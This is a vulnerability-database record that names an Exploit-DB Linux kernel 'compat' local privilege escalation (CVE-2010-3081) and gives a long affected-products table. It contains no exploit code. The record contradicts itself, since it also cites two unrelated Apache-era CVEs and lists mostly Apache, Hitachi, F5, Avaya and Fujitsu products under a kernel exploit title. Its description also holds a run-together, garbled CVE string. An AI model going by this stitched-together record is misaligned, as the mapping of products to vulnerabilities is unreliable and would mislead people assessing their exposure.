Details of VAR-E-201009-1222

ID

VAR-E-201009-1222

CVE

cve_id:	CVE-2010-3081	Trust: 1.0
cve_id:	CVE-2012-0053	Trust: 0.8
cve_id:	CVE-2011-3368	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 15024

EDB ID

15024

TITLE

Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation - Linux_x86-64 local Exploit

Trust: 1.0

sources: EXPLOIT-DB: 15024

DESCRIPTION

Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation. CVE-2010-3081CVE-68213 . local exploit for Linux_x86-64 platform

Trust: 1.0

sources: EXPLOIT-DB: 15024

AFFECTED PRODUCTS

vendor:	hitachi	model:	web server	scope:	eq	version:	02-03	Trust: 1.8
vendor:	hitachi	model:	web server 02-04-/a	scope:	-	version:	-	Trust: 1.5
vendor:	hitachi	model:	web server	scope:	eq	version:	02-02	Trust: 1.2
vendor:	hitachi	model:	web server	scope:	eq	version:	02-01	Trust: 1.2
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1	Trust: 1.2
vendor:	linux	model:	kernel (redhat	scope:	eq	version:	2.6.27<2.6.36x86-64)	Trust: 1.0
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.2	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/c	scope:	-	version:	-	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/b	scope:	-	version:	-	Trust: 0.9
vendor:	hitachi	model:	web server 01-02-/a	scope:	-	version:	-	Trust: 0.9
vendor:	ubuntu	model:	linux lts sparc	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts powerpc	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts lpia	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	8.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	11.10	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	11.10	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	11.04	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.10	Trust: 0.6
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.6
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.6
vendor:	slackware	model:	linux x86 64 -current	scope:	-	version:	-	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.37	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.37	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.1	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.1	Trust: 0.6
vendor:	slackware	model:	linux x86 64	scope:	eq	version:	13.0	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	13.0	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.2	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.1	Trust: 0.6
vendor:	slackware	model:	linux	scope:	eq	version:	12.0	Trust: 0.6
vendor:	slackware	model:	linux -current	scope:	-	version:	-	Trust: 0.6
vendor:	redhat	model:	enterprise linux desktop workstation client	scope:	eq	version:	5	Trust: 0.6
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.6
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.6
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2011	Trust: 0.6
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2011	Trust: 0.6
vendor:	mandriva	model:	linux mandrake x86 64	scope:	eq	version:	2010.1	Trust: 0.6
vendor:	mandriva	model:	linux mandrake	scope:	eq	version:	2010.1	Trust: 0.6
vendor:	mandrakesoft	model:	enterprise server x86 64	scope:	eq	version:	5	Trust: 0.6
vendor:	mandrakesoft	model:	enterprise server	scope:	eq	version:	5	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.3	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.1	Trust: 0.6
vendor:	hp	model:	system management homepage	scope:	eq	version:	6.0	Trust: 0.6
vendor:	hitachi	model:	web server linux	scope:	eq	version:	04-00	Trust: 0.6
vendor:	hitachi	model:	web server linux	scope:	eq	version:	03-00	Trust: 0.6
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00	Trust: 0.6
vendor:	hitachi	model:	web server 02-04-/b	scope:	-	version:	-	Trust: 0.6
vendor:	hitachi	model:	web server	scope:	eq	version:	02-04	Trust: 0.6
vendor:	hitachi	model:	web server	scope:	eq	version:	01-02	Trust: 0.6
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio standard-j edition b	scope:	eq	version:	9.1.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage studio enterprise edition b	scope:	eq	version:	9.1.0	Trust: 0.6
vendor:	fujitsu	model:	interstage job workload server	scope:	eq	version:	8.1	Trust: 0.6
vendor:	fujitsu	model:	interstage business application server enterprise	scope:	eq	version:	8.0.0	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition	scope:	eq	version:	7.0	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition 6.0a	scope:	-	version:	-	Trust: 0.6
vendor:	fujitsu	model:	interstage apworks modelers-j edition	scope:	eq	version:	6.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.2	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition a	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	9.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.2	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	8.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	7.0.1	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	7.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	6.0	Trust: 0.6
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	5.0	Trust: 0.6
vendor:	debian	model:	linux sparc	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux s/390	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux powerpc	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux mips	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux ia-64	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux ia-32	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux arm	scope:	eq	version:	6.0	Trust: 0.6
vendor:	debian	model:	linux amd64	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1.2	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.1.1	Trust: 0.6
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	5.1	Trust: 0.6
vendor:	avaya	model:	voice portal sp2	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	voice portal sp1	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	voice portal	scope:	eq	version:	5.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	8.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	7.0	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	ip office application server	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.3	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp2	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura session manager sp2	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager sp1	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	5.2	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	1.1	Trust: 0.6
vendor:	avaya	model:	aura session manager	scope:	eq	version:	1.0	Trust: 0.6
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.0.1	Trust: 0.6
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura experience portal	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.2	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager utility services	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	6.0.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	6.0	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	6.1.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	6.1	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.3	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2.2	Trust: 0.6
vendor:	avaya	model:	aura application enablement services	scope:	eq	version:	5.2	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.3	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.2	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.1	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7	Trust: 0.6
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.6.8	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.4	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.3	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.2	Trust: 0.6
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7.1	Trust: 0.6
vendor:	avaya	model:	aura communication manager	scope:	eq	version:	4.0	Trust: 0.6
vendor:	apache	model:	software foundation apache	scope:	eq	version:	2.2	Trust: 0.6
vendor:	apache	model:	software foundation apache	scope:	eq	version:	1.3	Trust: 0.6
vendor:	apache	model:	protocol.c cookie	scope:	-	version:	-	Trust: 0.5
vendor:	xerox	model:	freeflow print server 73.c0.41	scope:	-	version:	-	Trust: 0.3
vendor:	xerox	model:	freeflow print server 73.b3.61	scope:	-	version:	-	Trust: 0.3
vendor:	suse	model:	linux enterprise server for vmware sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise server sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise server sp4	scope:	eq	version:	10	Trust: 0.3
vendor:	suse	model:	linux enterprise sdk sp1	scope:	eq	version:	11	Trust: 0.3
vendor:	suse	model:	linux enterprise sdk sp4	scope:	eq	version:	10	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.8.1	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.8.0	Trust: 0.3
vendor:	sophos	model:	web appliance	scope:	eq	version:	3.7.9	Trust: 0.3
vendor:	redhat	model:	jboss enterprise web server for rhel	scope:	eq	version:	61.0	Trust: 0.3
vendor:	redhat	model:	jboss enterprise web server for rhel server	scope:	eq	version:	51.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux hpc node	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop optional	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop	scope:	eq	version:	6	Trust: 0.3
vendor:	redhat	model:	enterprise linux desktop client	scope:	eq	version:	5	Trust: 0.3
vendor:	redhat	model:	enterprise linux server	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	juniper	model:	nsmexpress	scope:	eq	version:	-	Trust: 0.3
vendor:	juniper	model:	nsm3000	scope:	eq	version:	-	Trust: 0.3
vendor:	juniper	model:	network and security manager software	scope:	eq	version:	2012.2-	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.2	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	12.1	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.3	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.2	Trust: 0.3
vendor:	juniper	model:	junos space	scope:	eq	version:	11.1	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.20	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.1.0	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.0.5	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.3.0.0	Trust: 0.3
vendor:	hp	model:	xp provisioning manager	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	eq	version:	7.4.0-00	Trust: 0.3
vendor:	hp	model:	xp p9000 command view advanced edition	scope:	eq	version:	7.3.1-00	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	7.1	Trust: 0.3
vendor:	hp	model:	system management homepage	scope:	eq	version:	7.0	Trust: 0.3
vendor:	hp	model:	p9000 tiered storage manager	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication monitor	scope:	eq	version:	6.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication monitor	scope:	eq	version:	5.0.0-00	Trust: 0.3
vendor:	hp	model:	p9000 replication manager	scope:	eq	version:	6.0.0-00	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	eq	version:	3.55	Trust: 0.3
vendor:	hp	model:	onboard administrator	scope:	eq	version:	3.50	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.31	scope:	-	version:	-	Trust: 0.3
vendor:	hp	model:	hp-ux b.11.11	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-03(x64)	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-01(x64)	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-00-060	Trust: 0.3
vendor:	hitachi	model:	web server security enhancement 02-04-/b	scope:	eq	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10-03	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-10-02	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-10-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-10	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-00-05	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-00-04	Trust: 0.3
vendor:	hitachi	model:	web server solaris	scope:	eq	version:	04-00-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server aix	scope:	eq	version:	04-00	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-10-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-10-09	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-10	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00-05	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	03-00-02	Trust: 0.3
vendor:	hitachi	model:	web server hp-ux	scope:	eq	version:	03-00-01	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	03-00-01	Trust: 0.3
vendor:	hitachi	model:	web server windows	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server solaris	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server aix	scope:	eq	version:	03-00	Trust: 0.3
vendor:	hitachi	model:	web server	scope:	eq	version:	02-05	Trust: 0.3
vendor:	hitachi	model:	web server 02-04-/c	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server 02-04-/a (windows(ip	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	web server )	scope:	eq	version:	02-04	Trust: 0.3
vendor:	hitachi	model:	web server )	scope:	eq	version:	02-03	Trust: 0.3
vendor:	hitachi	model:	web server 01-02-/d	scope:	-	version:	-	Trust: 0.3
vendor:	hitachi	model:	cosminexus developer no version	scope:	eq	version:	0	Trust: 0.3
vendor:	hitachi	model:	cosminexus application server no version	scope:	eq	version:	0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	9.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	8.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	7.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	6.0	Trust: 0.3
vendor:	hitachi	model:	cosminexus	scope:	eq	version:	5.0	Trust: 0.3
vendor:	fujitsu	model:	interstage studio standard-j edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	fujitsu	model:	interstage studio enterprise edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	fujitsu	model:	interstage application server standard-j edition	scope:	eq	version:	9.3.1	Trust: 0.3
vendor:	fujitsu	model:	interstage application server enterprise edition	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	7.0	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	6.1	Trust: 0.3
vendor:	f5	model:	enterprise manager	scope:	eq	version:	2.3	Trust: 0.3
vendor:	f5	model:	enterprise manager	scope:	eq	version:	2.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip wom	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip wom hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip webaccelerator hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip psm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip gtm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.0.00	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.40	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.0.00	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip asm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip apm hf1	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.1.0	Trust: 0.3
vendor:	f5	model:	big-ip analytics 11.0.0-hf2	scope:	-	version:	-	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.0.0	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.4	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.3	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.2	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.1.1	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.1	Trust: 0.3
vendor:	f5	model:	arx	scope:	eq	version:	6.0	Trust: 0.3
vendor:	avaya	model:	aura messaging	scope:	eq	version:	6.1	Trust: 0.3
vendor:	apple	model:	mac os server	scope:	eq	version:	x10.7.5	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.7	Trust: 0.3
vendor:	apple	model:	mac os	scope:	eq	version:	x10.6.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.15	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.14	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.13	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.12	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.11	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.10	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.9	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.8	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.6	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.5	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.4	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.3	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2.2	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.2	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.63	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.61	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.60	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.59	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.58	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.57	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.56	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.55	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.54	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.53	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.52	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.51	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.50	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.49	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.48	Trust: 0.3
vendor:	apache	model:	apache	scope:	eq	version:	2.0.47	Trust: 0.3
